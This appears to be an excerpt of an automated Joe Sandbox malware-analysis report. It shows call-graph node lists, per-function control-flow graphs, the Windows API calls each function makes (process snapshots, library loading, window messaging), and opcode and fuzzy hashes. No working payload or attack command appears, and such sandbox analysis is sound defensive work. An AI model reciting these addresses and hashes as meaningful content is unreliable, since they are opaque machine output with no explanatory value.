25118 b85fbf 25117->25118 25121 b85fc4 25118->25121 25120 b87902 25120->25092 25122 b85fcf 25121->25122 25123 b87a37 25122->25123 25128 b87f39 25122->25128 25132 b88036 25122->25132 25136 b88070 25122->25136 25140 b87edf 25122->25140 25123->25120 25129 b87f3d 25128->25129 25130 b88103 25129->25130 25144 b8fa3f 25129->25144 25130->25123 25133 b88040 25132->25133 25134 b88103 25133->25134 25135 b8fa3f BasepGetComputerNameFromNtPath 25133->25135 25134->25123 25135->25134 25137 b88095 25136->25137 25138 b88103 25137->25138 25139 b8fa3f BasepGetComputerNameFromNtPath 25137->25139 25138->25123 25139->25138 25141 b87f4f 25140->25141 25142 b88103 25141->25142 25143 b8fa3f BasepGetComputerNameFromNtPath 25141->25143 25142->25123 25143->25142 25145 b8f9d8 25144->25145 25146 b8fa4e 25144->25146 25145->25130 25147 b8fb3f BasepGetComputerNameFromNtPath 25146->25147 25148 b8fb4c 25146->25148 25147->25148 25148->25130 25149 b80628 25150 b80661 CreateToolhelp32Snapshot 25149->25150 25152 b8077d GetCurrentConsoleFont 25150->25152 25154 b808fc 25152->25154 25154->25154 25155 b8b5a8 25156 b8b5ba 25155->25156 25158 b8b6d5 25156->25158 25159 b80b40 25156->25159 25161 b80b4b 25159->25161 25160 b82e5e 25160->25158 25161->25160 25162 b82e53 KiUserCallbackDispatcher 25161->25162 25162->25160 25163 b833a8 25164 b833d3 25163->25164 25165 b80b40 KiUserCallbackDispatcher 25164->25165 25167 b8342c 25164->25167 25166 b83425 25165->25166 25209 b85acb 25210 b85ade 25209->25210 25214 b85c48 PostMessageW 25210->25214 25216 b85c22 PostMessageW 25210->25216 25211 b85b01 25215 b85cb4 25214->25215 25215->25211 25217 b85cb4 25216->25217 25217->25211 25218 b87280 25219 b873af 25218->25219 25221 b872ad 25218->25221 25220 b872cd 25221->25220 25222 b85f44 BasepGetComputerNameFromNtPath 25221->25222 25222->25220 25223 b80040 25224 b8008e EnumThreadWindows 25223->25224 25225 b80084 25223->25225 25226 b800c0 25224->25226 25225->25224 25227 b84300 25230 b84326 25227->25230 25228 b8433a 25229 b845df 25230->25228 25231 b80a34 SendMessageW 25230->25231 25233 b84475 25230->25233 25231->25233 25232 b80b40 KiUserCallbackDispatcher 25232->25229 25233->25229 25233->25232

                                                        Executed Functions

                                                        Function 00B80628 Relevance: 3.2, APIs: 2, Instructions: 220processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 71 b80628-b80663 73 b8067b-b80680 71->73 74 b80665-b8066b 71->74 77 b8068a-b80694 73->77 78 b80682 73->78 75 b8066d 74->75 76 b8066f-b80671 74->76 75->73 76->73 80 b806d4-b806de 77->80 81 b80696-b806a9 77->81 78->77 84 b8075b 80->84 85 b806e0-b806fd 80->85 81->80 88 b806ab-b806c0 81->88 89 b80763-b8079a CreateToolhelp32Snapshot 84->89 85->84 90 b806ff-b80759 85->90 88->80 97 b806c2-b806cb 88->97 99 b8079c 89->99 100 b807a4-b807b8 89->100 90->89 97->80 103 b806cd 97->103 99->100 106 b807ba-b807c4 100->106 107 b807cc-b807d6 100->107 103->80 106->107 110 b807d8-b807e2 107->110 111 b807f0 107->111 110->111 112 b807e4-b807ee 110->112 113 b807f8-b80802 111->113 112->111 112->113 115 b80808-b80812 113->115 116 b80894-b808a7 113->116 115->116 119 b80818-b80822 115->119 120 b808a9-b808ac 116->120 121 b808b6-b808cf 116->121 119->116 123 b80824-b8085a 119->123 120->121 124 b808d9-b808fb GetCurrentConsoleFont 121->124 125 b808d1 121->125 123->116 132 b8085c-b8086b 123->132 129 b808fc 124->129 125->124 129->129 132->116 134 b8086d-b8088c 132->134 134->116
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B80770
                                                        • GetCurrentConsoleFont.KERNEL32 ref: 00B808F8
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: ConsoleCreateCurrentFontSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 1557748844-0
                                                        • Opcode ID: 2b11b000a7b251ddc5681c133e2d0e2d0f59bf9256ea242daaa4401b266d9727
                                                        • Instruction ID: 23c17f84060233eb9018db8204c84fd6f38f9b5628e84322750a4d4a54087569
                                                        • Opcode Fuzzy Hash: 2b11b000a7b251ddc5681c133e2d0e2d0f59bf9256ea242daaa4401b266d9727
                                                        • Instruction Fuzzy Hash: 17813935A20224CFDF94FB64D895AAD77B2FF85344F140068E402AB3B1DB34AC5ADB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80618 Relevance: 3.2, APIs: 2, Instructions: 237processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 b80618-b80624 1 b805ed-b805f4 call b807b3 0->1 2 b80626-b80663 0->2 7 b805f9-b80615 1->7 5 b8067b-b80680 2->5 6 b80665-b8066b 2->6 10 b8068a-b80694 5->10 11 b80682 5->11 8 b8066d 6->8 9 b8066f-b80671 6->9 8->5 9->5 14 b806d4-b806de 10->14 15 b80696-b806a9 10->15 11->10 18 b8075b 14->18 19 b806e0-b806fd 14->19 15->14 22 b806ab-b806c0 15->22 23 b80763-b8079a CreateToolhelp32Snapshot 18->23 19->18 24 b806ff-b80759 19->24 22->14 31 b806c2-b806cb 22->31 33 b8079c 23->33 34 b807a4-b807b8 23->34 24->23 31->14 37 b806cd 31->37 33->34 40 b807ba-b807c4 34->40 41 b807cc-b807d6 34->41 37->14 40->41 44 b807d8-b807e2 41->44 45 b807f0 41->45 44->45 46 b807e4-b807ee 44->46 47 b807f8-b80802 45->47 46->45 46->47 49 b80808-b80812 47->49 50 b80894-b808a7 47->50 49->50 53 b80818-b80822 49->53 54 b808a9-b808ac 50->54 55 b808b6-b808cf 50->55 53->50 57 b80824-b8085a 53->57 54->55 58 b808d9-b808fb GetCurrentConsoleFont 55->58 59 b808d1 55->59 57->50 66 b8085c-b8086b 57->66 63 b808fc 58->63 59->58 63->63 66->50 68 b8086d-b8088c 66->68 68->50
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B80770
                                                        • GetCurrentConsoleFont.KERNEL32 ref: 00B808F8
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: ConsoleCreateCurrentFontSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 1557748844-0
                                                        • Opcode ID: 0188500c4adece00ecbc131a1900fa01e5aa84441bb2730b2b478879258e7905
                                                        • Instruction ID: e54a230216db45631135e092fe14317839e8ce130b501592c1961967ba4237d1
                                                        • Opcode Fuzzy Hash: 0188500c4adece00ecbc131a1900fa01e5aa84441bb2730b2b478879258e7905
                                                        • Instruction Fuzzy Hash: 59916A35A20214CFDF94FB64C994AAD77B2FF85344F0400A9E502AB3B1DB34AC1ADB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8FA3F Relevance: 1.8, APIs: 1, Instructions: 279COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 199 b8fa3f-b8fa4c 200 b8f9d8-b8fa00 199->200 201 b8fa4e-b8fa9e 199->201 202 b8faa4-b8fabe call b8f180 201->202 203 b8fb56-b8fb62 call b88720 201->203 214 b8fac0-b8fac7 202->214 215 b8fb02-b8fb06 202->215 211 b8fb67-b8fb7b 203->211 222 b8fb7d-b8fbb2 call b87e64 call b8f190 211->222 223 b8fbc0-b8fbc4 211->223 214->215 219 b8fac9-b8fad0 214->219 216 b8fb08-b8fb0e 215->216 217 b8fb26-b8fb28 215->217 220 b8fb1b-b8fb20 216->220 221 b8fb10-b8fb18 call b8f048 216->221 217->203 224 b8fb2a-b8fb30 217->224 225 b8fc1b-b8fc9b call b8f058 call b8d92c call b8f038 219->225 226 b8fad6-b8faec 219->226 220->217 221->220 253 b8fbbd 222->253 254 b8fbb4 222->254 227 b8fbc6-b8fbd9 call b87e64 223->227 228 b8fc07-b8fc11 223->228 231 b8fb4c-b8fb50 224->231 232 b8fb32-b8fb3d call b8f068 224->232 259 b8fc9d-b8fcac call b8f048 225->259 260 b8fcc2-b8fcc7 225->260 226->225 243 b8faf2-b8faff 226->243 227->225 244 b8fbdb-b8fbee 227->244 231->203 232->231 246 b8fb3f-b8fb49 BasepGetComputerNameFromNtPath 232->246 243->215 244->225 248 b8fbf0-b8fc02 call b8f1a0 244->248 246->231 248->228 253->223 254->253 268 b8fe59-b8fea4 259->268 269 b8fcb2-b8fcb9 259->269 262 b8fcc9-b8fccd 260->262 263 b8fcd2-b8fce0 260->263 265 b8fddb-b8fde4 262->265 266 b8fce2-b8fce4 263->266 267 b8fce6 263->267 270 b8fe02 265->270 271 b8fde6 265->271 272 b8fd03 266->272 273 b8fce8-b8fcea 267->273 274 b8fcec-b8fcf2 267->274 269->268 277 b8fcbf 269->277 275 b8fe04-b8fe06 270->275 271->270 278 b8fde8-b8fdf1 271->278 276 b8fd05-b8fd07 272->276 273->272 279 b8fcf8-b8fcfa 274->279 280 b8fcf4 274->280 284 b8fe08-b8fe22 call b8f1c0 275->284 285 b8fe27-b8fe58 275->285 287 b8fd09-b8fd32 call b8f1b0 276->287 288 b8fd35-b8fd39 276->288 277->260 289 b8fdf3 278->289 290 b8fdf7-b8fdf9 278->290 286 b8fd01 279->286 281 b8fcfc 280->281 282 b8fcf6 280->282 281->286 282->279 284->285 286->276 287->288 293 b8fd3b 288->293 294 b8fd52 288->294 295 b8fdfb 289->295 296 b8fdf5 289->296 297 b8fe00 290->297 293->294 301 b8fd3d-b8fd41 293->301 298 b8fd54-b8fd56 294->298 295->297 296->290 297->275 302 b8fd58-b8fd5c 298->302 303 b8fd5e-b8fd9e call b8f1c0 298->303 304 b8fd43 301->304 305 b8fd47-b8fd49 301->305 306 b8fda1-b8fda6 302->306 303->306 309 b8fd4b 304->309 310 b8fd45 304->310 311 b8fd50 305->311 313 b8fda8-b8fdac call b8f1d0 306->313 314 b8fdb1-b8fdb6 306->314 309->311 310->305 311->298 313->314 317 b8fdb9-b8fdbe 314->317 318 b8fdcf-b8fdd1 317->318 319 b8fdc0-b8fdc7 317->319 318->263 321 b8fdd7-b8fdd9 318->321 319->318 320 b8fdc9-b8fdcd 319->320 320->317 320->318 321->265
                                                        APIs
                                                        • BasepGetComputerNameFromNtPath.KERNEL32 ref: 00B8FB43
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: BasepComputerFromNamePath
                                                        • String ID:
                                                        • API String ID: 2034621824-0
                                                        • Opcode ID: 922b8727634a22e1786402983c194894b317473d5a950c256707276fbb700342
                                                        • Instruction ID: e926c3822b2635cb4157b237f1f9de1b8b89f8993c5ef124ba286b74e54fb030
                                                        • Opcode Fuzzy Hash: 922b8727634a22e1786402983c194894b317473d5a950c256707276fbb700342
                                                        • Instruction Fuzzy Hash: CDA1AF71A00206CFCB15AFA4D4586BEBBF2EF85314F2584F9D446AB2A2DB35CC55CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B860F8 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 322 b860f8-b86132 call b85da4 327 b8613b-b8613d 322->327 328 b86134-b86136 call b85db4 322->328 330 b86144-b86152 327->330 328->327 332 b86180 330->332 333 b86154-b8615d 330->333 334 b86182-b86188 332->334 333->332 338 b8615f-b86168 333->338 336 b8618e-b861b9 call b85dc4 call b85dd4 334->336 337 b86286-b8628d 334->337 349 b861bb 336->349 350 b861be-b861e3 call b85de4 call b85df4 336->350 338->332 341 b8616a-b8617e call b842e4 338->341 341->334 349->350 356 b861e8-b8622b GetCommState call b85e04 call b85e10 350->356 357 b861e5 350->357 356->337 364 b8622d-b86283 356->364 357->356 364->337
                                                        APIs
                                                        • GetCommState.KERNEL32(00000000), ref: 00B861F0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: CommState
                                                        • String ID:
                                                        • API String ID: 4071006776-0
                                                        • Opcode ID: 62cf0b55e0141c265523c7365eb1445ddc424299739fa6f1588f52d02f1ab617
                                                        • Instruction ID: dddbaf2305be47d37b785bde8ba2f2561a1001f3a7591e5a401e3debd6ac143c
                                                        • Opcode Fuzzy Hash: 62cf0b55e0141c265523c7365eb1445ddc424299739fa6f1588f52d02f1ab617
                                                        • Instruction Fuzzy Hash: EA41B031B106189BCF54FBB5D854AADB7F6AFC8301F144079E402AB2A2EF749D01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B860E8 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 371 b860e8-b86132 call b85da4 376 b8613b-b8613d 371->376 377 b86134-b86136 call b85db4 371->377 379 b86144-b86152 376->379 377->376 381 b86180 379->381 382 b86154-b8615d 379->382 383 b86182-b86188 381->383 382->381 387 b8615f-b86168 382->387 385 b8618e-b861b9 call b85dc4 call b85dd4 383->385 386 b86286-b8628d 383->386 398 b861bb 385->398 399 b861be-b861e3 call b85de4 call b85df4 385->399 387->381 390 b8616a-b8617e call b842e4 387->390 390->383 398->399 405 b861e8-b8622b GetCommState call b85e04 call b85e10 399->405 406 b861e5 399->406 405->386 413 b8622d-b86283 405->413 406->405 413->386
                                                        APIs
                                                        • GetCommState.KERNEL32(00000000), ref: 00B861F0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: CommState
                                                        • String ID:
                                                        • API String ID: 4071006776-0
                                                        • Opcode ID: 6a35cebe51c8195c2b8bf048e4d0bdbefbd9733ec3b0888dcae994261c1d2652
                                                        • Instruction ID: 6a90be5c3e8226c77b20f1f41090298c353ad8623727d5fc94acd2fabd2d8cf8
                                                        • Opcode Fuzzy Hash: 6a35cebe51c8195c2b8bf048e4d0bdbefbd9733ec3b0888dcae994261c1d2652
                                                        • Instruction Fuzzy Hash: 2941E431B106199BCF45FBB0D9546AD77F3AF88301F144479E402AB2A2EF749D02CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80B40 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 420 b80b40-b82de2 423 b82e5e-b82e61 420->423 424 b82de4-b82def 420->424 425 b82e86-b82e88 423->425 424->423 431 b82df1-b82e17 424->431 427 b82e8a-b82e93 425->427 428 b82e95-b82e97 425->428 427->428 435 b82e63-b82e6f 427->435 429 b82e99-b82ea2 428->429 430 b82eb7-b82ec4 428->430 429->430 436 b82ea4-b82eb1 429->436 437 b82e19-b82e1f 431->437 438 b82e20-b82e29 431->438 435->428 443 b82e71-b82e84 435->443 436->430 437->438 440 b82e2b-b82e3e 438->440 441 b82e40-b82e5c KiUserCallbackDispatcher 438->441 440->430 440->441 441->430 443->425
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00B82E57
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 47b246bfb40774f5abdfb7ea5978fe9d2d4aa833d0214e453feb1322d8b519ad
                                                        • Instruction ID: 1a85a525701b9b84e171e71ac69140644ba8a91345e7d553eb17b381139b2962
                                                        • Opcode Fuzzy Hash: 47b246bfb40774f5abdfb7ea5978fe9d2d4aa833d0214e453feb1322d8b519ad
                                                        • Instruction Fuzzy Hash: C8316975A002299FDB10AF65C484AAEBBF4FF48B15F1444A9E815AB364DB34EC01CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BD9226 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 449 bd9226-bd9287 450 bd9289-bd92ae 449->450 451 bd92db-bd9327 LoadLibraryA 449->451 450->451 454 bd92b0-bd92b2 450->454 455 bd9329-bd932f 451->455 456 bd9330-bd9361 451->456 457 bd92d5-bd92d8 454->457 458 bd92b4-bd92be 454->458 455->456 463 bd9371 456->463 464 bd9363-bd9367 456->464 457->451 460 bd92c0 458->460 461 bd92c2-bd92d1 458->461 460->461 461->461 466 bd92d3 461->466 467 bd9372 463->467 464->463 465 bd9369 464->465 465->463 466->457 467->467
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816495363.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_bd0000_systems.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8d437feaa888e9f9b21cc0ceb2f3e492d738456178d00ad16c1e1e83632f4f88
                                                        • Instruction ID: 2c2e75d9704974078acc013e6a7f9ab38f444015f61072592cb76e67604dae42
                                                        • Opcode Fuzzy Hash: 8d437feaa888e9f9b21cc0ceb2f3e492d738456178d00ad16c1e1e83632f4f88
                                                        • Instruction Fuzzy Hash: B64165B1D006589FDB10CFA9C88479EFBF1EB48724F14816AD819EB384E7B49846CF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BD6064 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 468 bd6064-bd9287 470 bd9289-bd92ae 468->470 471 bd92db-bd9327 LoadLibraryA 468->471 470->471 474 bd92b0-bd92b2 470->474 475 bd9329-bd932f 471->475 476 bd9330-bd9361 471->476 477 bd92d5-bd92d8 474->477 478 bd92b4-bd92be 474->478 475->476 483 bd9371 476->483 484 bd9363-bd9367 476->484 477->471 480 bd92c0 478->480 481 bd92c2-bd92d1 478->481 480->481 481->481 486 bd92d3 481->486 487 bd9372 483->487 484->483 485 bd9369 484->485 485->483 486->477 487->487
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816495363.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_bd0000_systems.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 3f03cbac49d914aac0d998c073ba884e148c8dbd9b4ae05a6c243f49a953ad81
                                                        • Instruction ID: 5f9311e3a449e9910cd44657cea82c03c7d891191a5a58613396fa4ca52cba9f
                                                        • Opcode Fuzzy Hash: 3f03cbac49d914aac0d998c073ba884e148c8dbd9b4ae05a6c243f49a953ad81
                                                        • Instruction Fuzzy Hash: C04146B1E006589FDB10CFA9C88479EFBF1EB48724F14816AE819E7384E7B49845CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B807B3 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 488 b807b3-b807e2 489 b807f0 488->489 490 b807e4-b807ee 488->490 491 b807f8-b80802 489->491 490->489 490->491 493 b80808-b80812 491->493 494 b80894-b808a7 491->494 493->494 497 b80818-b80822 493->497 498 b808a9-b808ac 494->498 499 b808b6-b808cf 494->499 497->494 501 b80824-b8085a 497->501 498->499 502 b808d9-b808fb GetCurrentConsoleFont 499->502 503 b808d1 499->503 501->494 510 b8085c-b8086b 501->510 507 b808fc 502->507 503->502 507->507 510->494 512 b8086d-b8088c 510->512 512->494
                                                        APIs
                                                        • GetCurrentConsoleFont.KERNEL32 ref: 00B808F8
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: ConsoleCurrentFont
                                                        • String ID:
                                                        • API String ID: 2874077460-0
                                                        • Opcode ID: ffe05fe0a1fb1a0da7f202508dbaee176675b540f4b384591bb3865e516ed6b7
                                                        • Instruction ID: 58395f1194470a74572ea1b78f51436ce66acbf8de8618473f3237204b3fab69
                                                        • Opcode Fuzzy Hash: ffe05fe0a1fb1a0da7f202508dbaee176675b540f4b384591bb3865e516ed6b7
                                                        • Instruction Fuzzy Hash: 2941C234620254CFDB95FBA4C898EAD77B2FF45354F0440A9E8016B3B2DB38AC49CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80006 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1212 b80006-b80082 1213 b8008e-b800be EnumThreadWindows 1212->1213 1214 b80084-b8008c 1212->1214 1215 b800c0-b800c6 1213->1215 1216 b800c7-b800f4 1213->1216 1214->1213 1215->1216
                                                        APIs
                                                        • EnumThreadWindows.USER32(?,00000000,?), ref: 00B800B1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: EnumThreadWindows
                                                        • String ID:
                                                        • API String ID: 2941952884-0
                                                        • Opcode ID: b14bdba01283e22353613664fa412dfe93595d87ec982b65e1b2e88d4d50c296
                                                        • Instruction ID: 405e5a6de3f16daa3d169b91980089bfd76329c51210e26ba6b3462324704ce0
                                                        • Opcode Fuzzy Hash: b14bdba01283e22353613664fa412dfe93595d87ec982b65e1b2e88d4d50c296
                                                        • Instruction Fuzzy Hash: CC315EB19093898FDB01CF69C8447AEFBF4BF49214F08849AD454E7292D7789945CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B81A48 Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1220 b81a48-b81a49 1221 b81a4b-b81ac4 1220->1221 1222 b81a02-b81a1a SendMessageW 1220->1222 1228 b81acd-b81ae1 1221->1228 1229 b81ac6-b81acc 1221->1229 1224 b81a1c-b81a22 1222->1224 1225 b81a23-b81a37 1222->1225 1224->1225 1229->1228
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?,?,?,?,?,00B81999,?,?,00000000), ref: 00B81A0D
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: e46bc10054373096845547d2525e572959d2d695f7881b97628730d3812fb2c2
                                                        • Instruction ID: cdc5e50a8c3b4c3641940854699805925a2465ce94741a9d0d2452f3dae677ba
                                                        • Opcode Fuzzy Hash: e46bc10054373096845547d2525e572959d2d695f7881b97628730d3812fb2c2
                                                        • Instruction Fuzzy Hash: 0E217CB6801249CFCB20DF99D4847EEFBF8EF48324F14845AD569A3200C378A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82D90 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1231 b82d90-b82de2 1233 b82e5e-b82e61 1231->1233 1234 b82de4-b82def 1231->1234 1235 b82e86-b82e88 1233->1235 1234->1233 1241 b82df1-b82e17 1234->1241 1237 b82e8a-b82e93 1235->1237 1238 b82e95-b82e97 1235->1238 1237->1238 1245 b82e63-b82e6f 1237->1245 1239 b82e99-b82ea2 1238->1239 1240 b82eb7-b82ec4 1238->1240 1239->1240 1246 b82ea4-b82eb1 1239->1246 1247 b82e19-b82e1f 1241->1247 1248 b82e20-b82e29 1241->1248 1245->1238 1253 b82e71-b82e84 1245->1253 1246->1240 1247->1248 1250 b82e2b-b82e3e 1248->1250 1251 b82e40-b82e4d 1248->1251 1250->1240 1250->1251 1255 b82e53-b82e5c KiUserCallbackDispatcher 1251->1255 1253->1235 1255->1240
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00B82E57
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 33df13a3c222bd648fb873a52cf2ab69348b158e077efe0f0db3ad14127f04c4
                                                        • Instruction ID: ab96ad39bdc39e3e3b1a18b86cf9976092a8f42b54e2f020bad0386f6504779f
                                                        • Opcode Fuzzy Hash: 33df13a3c222bd648fb873a52cf2ab69348b158e077efe0f0db3ad14127f04c4
                                                        • Instruction Fuzzy Hash: E12157B5A003158FDB109FA5C484BAEBBF4FF09725F1985A9D824A7354C734A841CFE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B85C22 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1259 b85c22-b85cb2 PostMessageW 1260 b85cbb-b85cdc 1259->1260 1261 b85cb4-b85cba 1259->1261 1261->1260
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 00B85CA5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 431ab481b714d7d74e5f09b19f3aa22fd49cdfc80510341b433cd4bd15ccc416
                                                        • Instruction ID: 6dd4e78b01510b9ad0a56df2fa9878ed5979b12cf9f3afecfb2b1bdb53e8cdbd
                                                        • Opcode Fuzzy Hash: 431ab481b714d7d74e5f09b19f3aa22fd49cdfc80510341b433cd4bd15ccc416
                                                        • Instruction Fuzzy Hash: 6C214CB18083848FDB11CFA5C8447DEBFF4AB19324F18449AD994E7252D378A948CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80040 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumThreadWindows.USER32(?,00000000,?), ref: 00B800B1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: EnumThreadWindows
                                                        • String ID:
                                                        • API String ID: 2941952884-0
                                                        • Opcode ID: fd33312ae9bd66698a74c77ede399ea00384171e4069939c223f1882babcc11c
                                                        • Instruction ID: bd6864603cd128c00bb21b5ee7c1889dda928f88be4016aed90ca91f53c35b03
                                                        • Opcode Fuzzy Hash: fd33312ae9bd66698a74c77ede399ea00384171e4069939c223f1882babcc11c
                                                        • Instruction Fuzzy Hash: 0F2127B1D042098FDB50DF9AC844BEEFBF5EB88324F14842AD464A3250D774A945CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

